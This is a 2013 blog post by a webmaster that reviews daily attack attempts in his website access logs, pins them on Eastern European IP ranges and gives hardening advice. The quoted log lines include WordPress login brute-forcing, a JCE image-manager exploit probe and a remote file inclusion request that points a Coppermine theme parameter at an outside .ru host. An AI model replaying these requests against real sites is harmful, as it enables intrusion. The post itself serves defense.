Websites attacked daily from former Soviet Union IP addresses
April 7, 2013
Every day I read my website's raw access logs, looking for things most people ignore. Of course I want to know which search engines are sending me traffic to various pages I wrote and which pages are doing the best. But, more importantly to me, I want to know who is trying to hack my website.
When I talk to others about their websites, most of them are totally absorbed in getting the most visitors (and sales or exposure), meaning they are interested in SEO. That is a good thing, if done properly, not using spammy or blackhat tactics. They also ask about my opinions on this or that easy-to-install script that is offered by their web host. These scripts include blogs, shopping carts, CMS programs, image galleries, forums and the like. All of these add-on web software programs increase the user interactions between your website and its visitors. But, they also make your website more vulnerable to hackers.
As I read my access logs I see numerous attacks targeting various commonly installed website programs and scripts. Every single day there are dozens of probes for a WordPress login screen or admin panel. Image uploaders and themes are targeted constantly. Certain popular shopping carts are frequent targets. Plus, there seems to be a non-stop attempt by spammers to post spam comments and trackbacks on any form that will accepts user input.
One thing that most of the various and sundry attacks and probes have in common is where they come from (in IP space). Server hack attempts come mostly from Chinese IP addresses. WordPress login attempts and blog spam POSTS come mostly from Russian and Ukrainian IP addresses. Some spammers use a compromised computer or server in a different country as a relay.
Here are some recent raw access log entries exposing a source in the former Soviet Union (also Turkey):
46.119.119.60 (Ukraine) - - [07/Apr/2013:09:25:55 -0600]
"GET /blogs/(50 + signs)Result:+%F4%EE%F0%F3%EC+%ED%E5+%ED%E0%E9%E4%E5%ED+/
+%ED%E5+%F3%E4%E0%EB%EE%F1%FC+%EE%EF%F0%E5%E4%E5%EB%E8%F2%FC+IP HTTP/1.0"
37.57.25.225 (Ukraine) - - [07/Apr/2013:10:14:23 -0600] "GET /wp-login.php HTTP/1.0"
78.162.18.73 (Turkey) - - [07/Apr/2013:11:16:04 -0600]
"GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403
193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:50 -0600] "GET /wp-login.php HTTP/1.1" 404 (11 consecutive attempts!)
94.125.177.120 (Hungary) - - [31/Mar/2013:23:53:47 -0600]
"GET /blogs/technical_articles/modules/coppermine/themes/coppercop/theme.php?THEME DIR=
http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? HTTP/1.1" 403 333 "-" "pbwww-perl/6.02"
78.184.243.200 (Turkey) - - [31/Mar/2013:22:43:50 -0600]
"POST /wp-login.php HTTP/1.1" 403 376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0E)"
79.114.49.86 (Romania) - - [31/Mar/2013:22:14:31 -0600]
"GET /member/signup HTTP/1.1" 404
78.190.63.230 (Turkey) - - [31/Mar/2013:08:21:12 -0600]
"POST /wp-login.php HTTP/1.1" 403
(this one was relayed via a botted AT&T account) /blogs/2007/05/(42 + signs)Result:+chosen+nickname+%22bapatickmjuniora9658%22;+ReCaptcha+decoded;+%28JS%29;+
TryAntiSFS=3;+forum+connected+to+antispam-service+%28probably,+your+IP+and/or+nickname+was+BANNED+in+this+service%29;
+PM_LOGIN+mode;+no+post+sending+forms+are+found;
193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:52 -0600]
"GET /wp-login.php HTTP/1.1"
In addition to what I have listed above, there were untold log entries coming from Russian IP addresses, often with Russian user agent strings, performing what is known as referrer log spamming. This is where a website is listed in the "HTTP_REFERER) section of the access log. The Russian referred spam usually promotes dating and pornographic websites and I chose to not paste them into this article. Watch your access logs for website links leading to websites ending with .ru, .ua, .com.ua, .in, or .su, in the referer section, sometimes followed by a user agent that includes "MRA" or "ru" in the string.
Most of these IP addresses are already encompassed by my regularly updated Russian Blocklist, which is available online in two formats: .htaccess (for shared hosting accounts on Apache/Linux servers) and iptables (for dedicated and VPS Apache/Linux server hosting where you have root access). I do not currently publish a version that is compatible with Microsoft IIS servers, but I am pondering a possible conversion. Anybody whose website is hosted on an Apache based web server should be allowed to use the .htaccess directives in the Russian Blocklist, by copying and pasting them into your existing .htaccess file, or by creating a new one from the blocklist example (read instructions in file).
If you deploy any website software that runs on PHP, expect vulnerabilities to be sought and found by hackers.Subscribe to any email lists for notices of updates from each maintainer of the web software that you or your predecessors have installed into your websites. Patching vulnerable web software quickly is vital if one is to keep their website from serving malicious scripts and hidden iframes that will lead to your visitors computers getting infected with malware, ransomware, or search hijackers.
Additionally, since many of the probes I log are looking to login to a WordPress installation, please change the default password to something unguessable! Further, change the name of any folders that are named "admin" by a default installation. Hackers send bots searching for such folders, then login with the default user name and password, then add malicious scripts to your web pages.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.